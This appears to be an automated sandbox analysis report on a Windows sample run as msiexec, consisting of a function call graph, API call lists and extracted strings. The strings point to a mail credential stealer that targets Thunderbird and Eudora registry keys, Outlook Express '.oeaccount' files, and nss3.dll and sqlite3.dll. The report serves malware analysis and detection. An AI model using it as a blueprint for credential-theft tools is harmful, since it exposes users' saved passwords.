33441->33448 33443 4096c9 33449 409278 GetPrivateProfileStringA 33443->33449 33445 4096da 33450 409278 GetPrivateProfileStringA 33445->33450 33447->33439 33448->33443 33449->33445 33450->33440 33537 409c1c 33451->33537 33454 401e69 memset 33576 410dbb 33454->33576 33457 401ec2 33600 4070e3 strlen _mbscat _mbscpy _mbscat 33457->33600 33458 401ed4 33589 406f81 GetFileAttributesA 33458->33589 33461 401ee6 strlen strlen 33463 401f15 33461->33463 33464 401f28 33461->33464 33601 4070e3 strlen _mbscat _mbscpy _mbscat 33463->33601 33590 406f81 GetFileAttributesA 33464->33590 33467 401f35 33591 401c31 33467->33591 33470 401f75 33472 402165 33470->33472 33473 401f9c memset 33470->33473 33471 401c31 5 API calls 33471->33470 33475 402195 ExpandEnvironmentStringsA 33472->33475 33476 4021a8 _strcmpi 33472->33476 33602 410b62 RegEnumKeyExA 33473->33602 33608 406f81 GetFileAttributesA 33475->33608 33476->33373 33476->33374 33477 401fc9 33477->33472 33479 401fd9 atoi 33477->33479 33483 402076 memset memset strlen strlen 33477->33483 33484 4020dd strlen strlen 33477->33484 33485 4070e3 strlen _mbscat _mbscpy _mbscat 33477->33485 33486 406f81 GetFileAttributesA 33477->33486 33487 402167 _mbscpy 33477->33487 33607 410b62 RegEnumKeyExA 33477->33607 33479->33477 33480 401fef memset memset sprintf 33479->33480 33603 410b1e 33480->33603 33483->33477 33484->33477 33485->33477 33486->33477 33487->33472 33489 40c422 33488->33489 33490 40c425 _mbscat _mbscpy _mbscpy 33488->33490 33489->33490 33491 40c49d 33490->33491 33492 40c512 33491->33492 33493 40c502 GetWindowPlacement 33491->33493 33494 40c538 33492->33494 33626 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33492->33626 33493->33492 33619 409b31 33494->33619 33498 40ba28 33499 40ba87 33498->33499 33504 40ba3c 33498->33504 33629 406c62 LoadCursorA SetCursor 33499->33629 33501 40ba8c 33630 403c16 33501->33630 33696 404734 33501->33696 33704 404785 33501->33704 33707 4107f1 33501->33707 33502 40ba43 _mbsicmp 33502->33504 33503 40baa0 33505 407e30 _strcmpi 33503->33505 33504->33499 33504->33502 33710 40b5e5 10 API calls 33504->33710 33508 40bab0 33505->33508 33506 40bafa SetCursor 33506->33380 33508->33506 33509 40baf1 qsort 33508->33509 33509->33506 34000 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33514->34000 33516 40b00e 33517 40b016 33516->33517 33518 40b01f GetStdHandle 33516->33518 34001 406d1a CreateFileA 33517->34001 33520 40b01c 33518->33520 33521 40b035 33520->33521 33522 40b12d 33520->33522 34002 406c62 LoadCursorA SetCursor 33521->34002 34006 406d77 9 API calls 33522->34006 33525 40b136 33536 40c580 28 API calls 33525->33536 33526 40b087 33533 40b0a1 33526->33533 34004 40a699 12 API calls 33526->34004 33527 40b042 33527->33526 33527->33533 34003 40a57c strlen WriteFile 33527->34003 33530 40b0d6 33531 40b116 CloseHandle 33530->33531 33532 40b11f SetCursor 33530->33532 33531->33532 33532->33525 33533->33530 34005 406d77 9 API calls 33533->34005 33535->33374 33536->33378 33549 409a32 33537->33549 33540 409c80 memcpy memcpy 33545 409cda 33540->33545 33541 408db6 12 API calls 33541->33545 33542 409d18 ??2@YAPAXI ??2@YAPAXI 33543 409d54 ??2@YAPAXI 33542->33543 33546 409d8b 33542->33546 33543->33546 33545->33540 33545->33541 33545->33542 33546->33546 33559 409b9c 33546->33559 33548 4023c1 33548->33454 33550 409a44 33549->33550 33551 409a3d ??3@YAXPAX 33549->33551 33552 409a52 33550->33552 33553 409a4b ??3@YAXPAX 33550->33553 33551->33550 33554 409a63 33552->33554 33555 409a5c ??3@YAXPAX 33552->33555 33553->33552 33556 409a83 ??2@YAPAXI ??2@YAPAXI 33554->33556 33557 409a73 ??3@YAXPAX 33554->33557 33558 409a7c ??3@YAXPAX 33554->33558 33555->33554 33556->33540 33557->33558 33558->33556 33560 407a55 free 33559->33560 33561 409ba5 33560->33561 33562 407a55 free 33561->33562 33563 409bad 33562->33563 33564 407a55 free 33563->33564 33565 409bb5 33564->33565 33566 407a55 free 33565->33566 33567 409bbd 33566->33567 33568 407a1f 4 API calls 33567->33568 33569 409bd0 33568->33569 33570 407a1f 4 API calls 33569->33570 33571 409bda 33570->33571 33572 407a1f 4 API calls 33571->33572 33573 409be4 33572->33573 33574 407a1f 4 API calls 33573->33574 33575 409bee 33574->33575 33575->33548 33577 410d0e 2 API calls 33576->33577 33578 410dca 33577->33578 33579 410dfd memset 33578->33579 33609 4070ae 33578->33609 33582 410e1d 33579->33582 33584 410e7f _mbscpy 33582->33584 33612 410d3d _mbscpy 33582->33612 33583 401e9e strlen strlen 33583->33457 33583->33458 33584->33583 33586 410e5b 33613 410add RegQueryValueExA 33586->33613 33588 410e73 33588->33584 33589->33461 33590->33467 33592 401c4c 33591->33592 33593 401ca1 33592->33593 33614 410add RegQueryValueExA 33592->33614 33593->33470 33593->33471 33595 401c6a 33595->33593 33596 401c71 strchr 33595->33596 33596->33593 33597 401c85 strchr 33596->33597 33597->33593 33598 401c94 33597->33598 33615 406f06 strlen 33598->33615 33600->33458 33601->33464 33602->33477 33604 410b34 33603->33604 33606 410b4c 33604->33606 33618 410add RegQueryValueExA 33604->33618 33606->33477 33607->33477 33608->33476 33610 4070bd GetVersionExA 33609->33610 33611 4070ce 33609->33611 33610->33611 33611->33579 33611->33583 33612->33586 33613->33588 33614->33595 33616 406f17 33615->33616 33617 406f1a memcpy 33615->33617 33616->33617 33617->33593 33618->33606 33620 409b40 33619->33620 33622 409b4e 33619->33622 33627 409901 memset SendMessageA 33620->33627 33623 409b99 33622->33623 33624 409b8b 33622->33624 33623->33498 33628 409868 SendMessageA 33624->33628 33626->33494 33627->33622 33628->33623 33629->33501 33631 4107f1 FreeLibrary 33630->33631 33632 403c30 LoadLibraryA 33631->33632 33633 403c74 33632->33633 33634 403c44 GetProcAddress 33632->33634 33636 4107f1 FreeLibrary 33633->33636 33634->33633 33635 403c5e 33634->33635 33635->33633 33639 403c6b 33635->33639 33637 403c7b 33636->33637 33638 404734 3 API calls 33637->33638 33640 403c86 33638->33640 33639->33637 33711 4036e5 33640->33711 33643 4036e5 23 API calls 33644 403c9a 33643->33644 33645 4036e5 23 API calls 33644->33645 33646 403ca4 33645->33646 33647 4036e5 23 API calls 33646->33647 33648 403cae 33647->33648 33721 4085d2 33648->33721 33654 403cd2 33656 403cf7 33654->33656 33873 402bd1 37 API calls 33654->33873 33657 403d1c 33656->33657 33874 402bd1 37 API calls 33656->33874 33756 402c5d 33657->33756 33661 4070ae GetVersionExA 33662 403d31 33661->33662 33664 403d61 33662->33664 33875 402b22 42 API calls 33662->33875 33666 403d97 33664->33666 33876 402b22 42 API calls 33664->33876 33667 403dcd 33666->33667 33877 402b22 42 API calls 33666->33877 33768 410808 33667->33768 33671 404785 FreeLibrary 33672 403de8 33671->33672 33772 402fdb 33672->33772 33675 402fdb 29 API calls 33676 403e00 33675->33676 33784 4032b7 33676->33784 33685 403e3b 33687 403e73 33685->33687 33688 403e46 _mbscpy 33685->33688 33831 40fb00 33687->33831 33879 40f334 333 API calls 33688->33879 33697 404785 FreeLibrary 33696->33697 33698 40473b LoadLibraryA 33697->33698 33699 40474c GetProcAddress 33698->33699 33700 40476e 33698->33700 33699->33700 33701 404764 33699->33701 33702 404781 33700->33702 33703 404785 FreeLibrary 33700->33703 33701->33700 33702->33503 33703->33702 33705 4047a3 33704->33705 33706 404799 FreeLibrary 33704->33706 33705->33503 33706->33705 33708 410807 33707->33708 33709 4107fc FreeLibrary 33707->33709 33708->33503 33709->33708 33710->33504 33712 4037c5 33711->33712 33713 4036fb 33711->33713 33712->33643 33713->33712 33714 403716 strchr 33713->33714 33714->33712 33715 403730 33714->33715 33880 4021b6 memset 33715->33880 33717 40373f _mbscpy _mbscpy strlen 33718 4037a4 _mbscpy 33717->33718 33719 403789 sprintf 33717->33719 33881 4023e5 16 API calls 33718->33881 33719->33718 33722 4085e2 33721->33722 33882 4082cd 11 API calls 33722->33882 33724 4085ec 33725 403cba 33724->33725 33726 40860b memset 33724->33726 33733 40821d 33725->33733 33884 410b62 RegEnumKeyExA 33726->33884 33728 408637 33728->33725 33729 40865c memset 33728->33729 33886 40848b 10 API calls 33728->33886 33887 410b62 RegEnumKeyExA 33728->33887 33885 410add RegQueryValueExA 33729->33885 33734 40823f 33733->33734 33735 403cc6 33734->33735 33736 408246 memset 33734->33736 33741 4086e0 33735->33741 33888 410b62 RegEnumKeyExA 33736->33888 33738 40826f 33738->33735 33889 4080ed 11 API calls 33738->33889 33890 410b62 RegEnumKeyExA 33738->33890 33891 4045db 33741->33891 33743 4088ef 33899 404656 33743->33899 33747 408737 wcslen 33747->33743 33753 40876a 33747->33753 33748 40877a wcsncmp 33748->33753 33750 404734 3 API calls 33750->33753 33751 404785 FreeLibrary 33751->33753 33752 408812 memset 33752->33753 33754 40883c memcpy wcschr 33752->33754 33753->33743 33753->33748 33753->33750 33753->33751 33753->33752 33753->33754 33755 4088c3 LocalFree 33753->33755 33902 40466b _mbscpy 33753->33902 33754->33753 33755->33753 33757 402c7a 33756->33757 33758 402c87 memset 33757->33758 33767 402d9a 33757->33767 33903 410b62 RegEnumKeyExA 33758->33903 33760 402cb2 33761 410b1e RegQueryValueExA 33760->33761 33763 402d3a sprintf 33760->33763 33760->33767 33904 402bd1 37 API calls 33760->33904 33905 402bd1 37 API calls 33760->33905 33906 410b62 RegEnumKeyExA 33760->33906 33762 402ce4 memset sprintf 33761->33762 33762->33760 33763->33760 33767->33661 33771 410816 33768->33771 33769 4107f1 FreeLibrary 33770 403ddd 33769->33770 33770->33671 33771->33769 33773 402ff9 33772->33773 33774 403006 memset 33773->33774 33776 403122 33773->33776 33907 410b62 RegEnumKeyExA 33774->33907 33776->33675 33777 410b1e RegQueryValueExA 33778 403058 memset sprintf 33777->33778 33782 403033 33778->33782 33779 4030a2 memset 33908 410b62 RegEnumKeyExA 33779->33908 33782->33776 33782->33777 33782->33779 33783 410b62 RegEnumKeyExA 33782->33783 33909 402db3 24 API calls 33782->33909 33783->33782 33785 4032d5 33784->33785 33786 4033a9 33784->33786 33910 4021b6 memset 33785->33910 33799 4034e4 memset memset 33786->33799 33788 4032e1 33911 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33788->33911 33790 4032ea 33791 4032f8 memset GetPrivateProfileSectionA 33790->33791 33912 4023e5 16 API calls 33790->33912 33791->33786 33796 40332f 33791->33796 33793 40339b strlen 33793->33786 33793->33796 33795 403350 strchr 33795->33796 33796->33786 33796->33793 33913 4021b6 memset 33796->33913 33914 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33796->33914 33915 4023e5 16 API calls 33796->33915 33800 410b1e RegQueryValueExA 33799->33800 33801 40353f 33800->33801 33802 40357f 33801->33802 33803 403546 _mbscpy 33801->33803 33807 403985 33802->33807 33916 406d55 strlen _mbscat 33803->33916 33805 403565 _mbscat 33917 4033f0 19 API calls 33805->33917 33918 40466b _mbscpy 33807->33918 33811 4039aa 33813 4039ff 33811->33813 33919 40f6e2 33811->33919 33935 40f460 12 API calls 33811->33935 33936 4038e8 21 API calls 33811->33936 33814 404785 FreeLibrary 33813->33814 33815 403a0b 33814->33815 33816 4037ca memset memset 33815->33816 33938 444551 memset 33816->33938 33819 4038e2 33819->33685 33878 40f334 333 API calls 33819->33878 33821 40382e 33822 406f06 2 API calls 33821->33822 33823 403843 33822->33823 33824 406f06 2 API calls 33823->33824 33825 403855 strchr 33824->33825 33826 403884 _mbscpy 33825->33826 33827 403897 strlen 33825->33827 33828 4038bf _mbscpy 33826->33828 33827->33828 33829 4038a4 sprintf 33827->33829 33947 4023e5 16 API calls 33828->33947 33829->33828 33833 40fb10 33831->33833 33832 403e7f 33841 40f96c 33832->33841 33833->33832 33834 40fb55 RegQueryValueExA 33833->33834 33834->33832 33835 40fb84 33834->33835 33836 404734 3 API calls 33835->33836 33837 40fb91 33836->33837 33837->33832 33838 40fc19 LocalFree 33837->33838 33839 40fbdd memcpy memcpy 33837->33839 33838->33832 33951 40f802 7 API calls 33839->33951 33842 4070ae GetVersionExA 33841->33842 33843 40f98d 33842->33843 33844 4045db 7 API calls 33843->33844 33852 40f9a9 33844->33852 33845 404656 FreeLibrary 33846 403e85 33845->33846 33853 4442ea memset 33846->33853 33847 40fae6 33847->33845 33848 40fa13 memset WideCharToMultiByte 33849 40fa43 _strnicmp 33848->33849 33848->33852 33850 40fa5b WideCharToMultiByte 33849->33850 33849->33852 33851 40fa88 WideCharToMultiByte 33850->33851 33850->33852 33851->33852 33852->33847 33852->33848 33854 410dbb 7 API calls 33853->33854 33855 444329 33854->33855 33952 40759e strlen strlen 33855->33952 33860 410dbb 7 API calls 33861 444350 33860->33861 33862 40759e 3 API calls 33861->33862 33863 44435a 33862->33863 33864 444212 64 API calls 33863->33864 33865 444366 memset memset 33864->33865 33866 410b1e RegQueryValueExA 33865->33866 33867 4443b9 ExpandEnvironmentStringsA strlen 33866->33867 33868 4443f4 _strcmpi 33867->33868 33869 4443e5 33867->33869 33870 403e91 33868->33870 33871 44440c 33868->33871 33869->33868 33870->33503 33872 444212 64 API calls 33871->33872 33872->33870 33873->33656 33874->33657 33875->33664 33876->33666 33877->33667 33878->33685 33879->33687 33880->33717 33881->33712 33883 40841c 33882->33883 33883->33724 33884->33728 33885->33728 33886->33728 33887->33728 33888->33738 33889->33738 33890->33738 33892 404656 FreeLibrary 33891->33892 33893 4045e3 LoadLibraryA 33892->33893 33894 404651 33893->33894 33895 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33893->33895 33894->33743 33894->33747 33896 40463d 33895->33896 33897 404643 33896->33897 33898 404656 FreeLibrary 33896->33898 33897->33894 33898->33894 33900 404666 33899->33900 33901 40465c FreeLibrary 33899->33901 33900->33654 33901->33900 33902->33753 33903->33760 33904->33763 33905->33760 33906->33760 33907->33782 33908->33782 33909->33782 33910->33788 33911->33790 33912->33791 33913->33795 33914->33796 33915->33796 33916->33805 33917->33802 33918->33811 33937 40466b _mbscpy 33919->33937 33921 40f6fa 33922 4045db 7 API calls 33921->33922 33923 40f708 33922->33923 33925 404734 3 API calls 33923->33925 33929 40f7e2 33923->33929 33924 404656 FreeLibrary 33926 40f7f1 33924->33926 33930 40f715 33925->33930 33927 404785 FreeLibrary 33926->33927 33928 40f7fc 33927->33928 33928->33811 33929->33924 33930->33929 33931 40f797 WideCharToMultiByte 33930->33931 33932 40f7b8 strlen 33931->33932 33933 40f7d9 LocalFree 33931->33933 33932->33933 33934 40f7c8 _mbscpy 33932->33934 33933->33929 33934->33933 33935->33811 33936->33811 33937->33921 33939 44458b 33938->33939 33940 40381a 33939->33940 33948 410add RegQueryValueExA 33939->33948 33940->33819 33946 4021b6 memset 33940->33946 33942 4445a4 33942->33940 33949 410add RegQueryValueExA 33942->33949 33944 4445c1 33944->33940 33950 444879 30 API calls 33944->33950 33946->33821 33947->33819 33948->33942 33949->33944 33950->33940 33951->33838 33953 4075c9 33952->33953 33954 4075bb _mbscat 33952->33954 33955 444212 33953->33955 33954->33953 33972 407e9d 33955->33972 33958 44424d 33959 444274 33958->33959 33960 444258 33958->33960 33980 407ef8 33958->33980 33961 407e9d 9 API calls 33959->33961 33997 444196 51 API calls 33960->33997 33968 4442a0 33961->33968 33963 407ef8 9 API calls 33963->33968 33964 4442ce 33994 407f90 33964->33994 33968->33963 33968->33964 33970 444212 64 API calls 33968->33970 33990 407e62 33968->33990 33969 407f90 FindClose 33971 4442e4 33969->33971 33970->33968 33971->33860 33973 407f90 FindClose 33972->33973 33974 407eaa 33973->33974 33975 406f06 2 API calls 33974->33975 33976 407ebd strlen strlen 33975->33976 33977 407ee1 33976->33977 33978 407eea 33976->33978 33998 4070e3 strlen _mbscat _mbscpy _mbscat 33977->33998 33978->33958 33981 407f03 FindFirstFileA 33980->33981 33982 407f24 FindNextFileA 33980->33982 33983 407f3f 33981->33983 33984 407f46 strlen strlen 33982->33984 33985 407f3a 33982->33985 33983->33984 33989 407f7f 33983->33989 33986 407f76 33984->33986 33984->33989 33987 407f90 FindClose 33985->33987 33999 4070e3 strlen _mbscat _mbscpy _mbscat 33986->33999 33987->33983 33989->33958 33991 407e94 33990->33991 33992 407e6c strcmp 33990->33992 33991->33968 33992->33991 33993 407e83 strcmp 33992->33993 33993->33991 33995 407fa3 33994->33995 33996 407f99 FindClose 33994->33996 33995->33969 33996->33995 33997->33958 33998->33978 33999->33989 34000->33516 34001->33520 34002->33527 34003->33526 34004->33533 34005->33530 34006->33525 34024 411853 RtlInitializeCriticalSection memset 34025 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34201 40a256 13 API calls 34203 432e5b 17 API calls 34205 43fa5a 20 API calls 34027 401060 41 API calls 34208 427260 CloseHandle memset memset 34031 410c68 FindResourceA SizeofResource LoadResource LockResource 34210 405e69 14 API calls 34033 433068 15 API calls __fprintf_l 34212 414a6d 18 API calls 34213 43fe6f 134 API calls 34035 424c6d 15 API calls __fprintf_l 34214 426741 19 API calls 34037 440c70 17 API calls 34038 443c71 42 API calls 34041 427c79 24 API calls 34217 416e7e memset __fprintf_l 34045 42800b 47 API calls 34046 425115 85 API calls __fprintf_l 34220 41960c 61 API calls 34047 43f40c 122 API calls __fprintf_l 34050 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34051 43f81a 20 API calls 34053 414c20 memset memset 34054 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34224 414625 18 API calls 34225 404225 modf 34226 403a26 strlen WriteFile 34228 40422a 12 API calls 34232 427632 memset memset memcpy 34233 40ca30 59 API calls 34234 404235 26 API calls 34055 42ec34 61 API calls __fprintf_l 34056 425115 76 API calls __fprintf_l 34235 425115 77 API calls __fprintf_l 34237 44223a 38 API calls 34062 43183c 112 API calls 34238 44b2c5 _onexit __dllonexit 34243 42a6d2 memcpy __allrem 34064 405cda 60 API calls 34251 43fedc 138 API calls 34252 4116e1 16 API calls __fprintf_l 34067 4244e6 19 API calls 34069 42e8e8 127 API calls __fprintf_l 34070 4118ee RtlLeaveCriticalSection 34257 43f6ec 22 API calls 34072 425115 119 API calls __fprintf_l 34073 410cf3 EnumResourceNamesA 34260 4492f0 memcpy memcpy 34262 43fafa 18 API calls 34264 4342f9 15 API calls __fprintf_l 34074 4144fd 19 API calls 34266 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34267 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34270 443a84 _mbscpy 34272 43f681 17 API calls 34077 404487 22 API calls 34274 415e8c 16 API calls __fprintf_l 34081 411893 RtlDeleteCriticalSection __fprintf_l 34082 41a492 42 API calls 34278 403e96 34 API calls 34279 410e98 memset SHGetPathFromIDList SendMessageA 34084 426741 109 API calls __fprintf_l 34085 4344a2 18 API calls 34086 4094a2 10 API calls 34088 4108a4 7 API calls 34282 4116a6 15 API calls __fprintf_l 34283 43f6a4 17 API calls 34284 440aa3 20 API calls 34286 427430 45 API calls 34090 4090b0 7 API calls 34091 4148b0 15 API calls 34093 4118b4 RtlEnterCriticalSection 34094 4014b7 CreateWindowExA 34095 40c8b8 19 API calls 34097 4118bf RtlTryEnterCriticalSection 34291 42434a 18 API calls __fprintf_l 34293 405f53 12 API calls 34105 43f956 59 API calls 34107 40955a 17 API calls 34108 428561 36 API calls 34109 409164 7 API calls 34297 404366 19 API calls 34301 40176c ExitProcess 34304 410777 42 API calls 34114 40dd7b 51 API calls 34115 425d7c 16 API calls __fprintf_l 34306 43f6f0 25 API calls 34307 42db01 22 API calls 34116 412905 15 API calls __fprintf_l 34308 403b04 54 API calls 34309 405f04 SetDlgItemTextA GetDlgItemTextA 34310 44b301 ??3@YAXPAX 34313 4120ea 14 API calls 3 library calls 34314 40bb0a 8 API calls 34316 413f11 strcmp 34120 434110 17 API calls __fprintf_l 34123 425115 108 API calls __fprintf_l 34317 444b11 _onexit 34125 425115 76 API calls __fprintf_l 34128 429d19 10 API calls 34320 444b1f __dllonexit 34321 409f20 _strcmpi 34130 42b927 31 API calls 34324 433f26 19 API calls __fprintf_l 34325 44b323 FreeLibrary 34326 427f25 46 API calls 34327 43ff2b 17 API calls 34328 43fb30 19 API calls 34137 414d36 16 API calls 34139 40ad38 7 API calls 34330 433b38 16 API calls __fprintf_l 34007 44b33b 34008 44b344 ??3@YAXPAX 34007->34008 34009 44b34b 34007->34009 34008->34009 34010 44b354 ??3@YAXPAX 34009->34010 34011 44b35b 34009->34011 34010->34011 34012 44b364 ??3@YAXPAX 34011->34012 34013 44b36b 34011->34013 34012->34013 34014 44b374 ??3@YAXPAX 34013->34014 34015 44b37b 34013->34015 34014->34015 34143 426741 21 API calls 34144 40c5c3 123 API calls 34146 43fdc5 17 API calls 34331 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34149 4161cb memcpy memcpy memcpy memcpy 34336 43ffc8 18 API calls 34150 4281cc 15 API calls __fprintf_l 34338 4383cc 110 API calls __fprintf_l 34151 4275d3 41 API calls 34339 4153d3 22 API calls __fprintf_l 34152 444dd7 _XcptFilter 34344 4013de 15 API calls 34346 425115 111 API calls __fprintf_l 34347 43f7db 18 API calls 34350 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34154 4335ee 16 API calls __fprintf_l 34352 429fef 11 API calls 34155 444deb _exit _c_exit 34353 40bbf0 133 API calls 34158 425115 79 API calls __fprintf_l 34357 437ffa 22 API calls 34162 4021ff 14 API calls 34163 43f5fc 149 API calls 34358 40e381 9 API calls 34165 405983 40 API calls 34166 42b186 27 API calls __fprintf_l 34167 427d86 76 API calls 34168 403585 20 API calls 34170 42e58e 18 API calls __fprintf_l 34173 425115 75 API calls __fprintf_l 34175 401592 8 API calls 33213 410b92 33216 410a6b 33213->33216 33215 410bb2 33217 410a77 33216->33217 33218 410a89 GetPrivateProfileIntA 33216->33218 33221 410983 memset _itoa WritePrivateProfileStringA 33217->33221 33218->33215 33220 410a84 33220->33215 33221->33220 34362 434395 16 API calls 34177 441d9c memcmp 34364 43f79b 119 API calls 34178 40c599 42 API calls 34365 426741 87 API calls 34182 4401a6 21 API calls 34184 426da6 memcpy memset memset memcpy 34185 4335a5 15 API calls 34187 4299ab memset memset memcpy memset memset 34188 40b1ab 8 API calls 34370 425115 76 API calls __fprintf_l 34374 4113b2 18 API calls 2 library calls 34378 40a3b8 memset sprintf SendMessageA 33222 410bbc 33225 4109cf 33222->33225 33226 4109dc 33225->33226 33227 410a23 memset GetPrivateProfileStringA 33226->33227 33228 4109ea memset 33226->33228 33233 407646 strlen 33227->33233 33238 4075cd sprintf memcpy 33228->33238 33231 410a0c WritePrivateProfileStringA 33232 410a65 33231->33232 33234 40765a 33233->33234 33236 40765c 33233->33236 33234->33232 33235 4076a3 33235->33232 33236->33235 33239 40737c strtoul 33236->33239 33238->33231 33239->33236 34190 40b5bf memset memset _mbsicmp

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 137 408432-40844e 132->137 138 40842d-408431 132->138 135 408460-408464 134->135 136 408465-408482 134->136 135->136 136->133 136->134 137->130 137->132 138->137
                      APIs
                      • memset.MSVCRT ref: 0040832F
                      • memset.MSVCRT ref: 00408343
                      • memset.MSVCRT ref: 0040835F
                      • memset.MSVCRT ref: 00408376
                      • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                      • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                      • strlen.MSVCRT ref: 004083E9
                      • strlen.MSVCRT ref: 004083F8
                      • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                      • String ID: 5$H$O$b$i$}$}
                      • API String ID: 1832431107-3760989150
                      • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                      • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                      • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                      • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 335 407ef8-407f01 336 407f03-407f22 FindFirstFileA 335->336 337 407f24-407f38 FindNextFileA 335->337 338 407f3f-407f44 336->338 339 407f46-407f74 strlen * 2 337->339 340 407f3a call 407f90 337->340 338->339 341 407f89-407f8f 338->341 342 407f83 339->342 343 407f76-407f81 call 4070e3 339->343 340->338 346 407f86-407f88 342->346 343->346 346->341
                      APIs
                      • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                      • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                      • strlen.MSVCRT ref: 00407F5C
                      • strlen.MSVCRT ref: 00407F64
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: FileFindstrlen$FirstNext
                      • String ID: ACD
                      • API String ID: 379999529-620537770
                      • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                      • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                      • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                      • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                      Control-flow Graph

                      APIs
                      • memset.MSVCRT ref: 00401E8B
                      • strlen.MSVCRT ref: 00401EA4
                      • strlen.MSVCRT ref: 00401EB2
                      • strlen.MSVCRT ref: 00401EF8
                      • strlen.MSVCRT ref: 00401F06
                      • memset.MSVCRT ref: 00401FB1
                      • atoi.MSVCRT(?), ref: 00401FE0
                      • memset.MSVCRT ref: 00402003
                      • sprintf.MSVCRT ref: 00402030
                      • memset.MSVCRT ref: 00402086
                      • memset.MSVCRT ref: 0040209B
                      • strlen.MSVCRT ref: 004020A1
                      • strlen.MSVCRT ref: 004020AF
                      • strlen.MSVCRT ref: 004020E2
                      • strlen.MSVCRT ref: 004020F0
                      • memset.MSVCRT ref: 00402018
                        • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                      • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                        • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                      • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: strlen$memset$_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                      • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                      • API String ID: 3833278029-4223776976
                      • Opcode ID: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                      • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                      • Opcode Fuzzy Hash: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                      • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                        • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                        • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                        • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                      • DeleteObject.GDI32(?), ref: 0040D1A6
                      Strings
                      Memory Dump Source
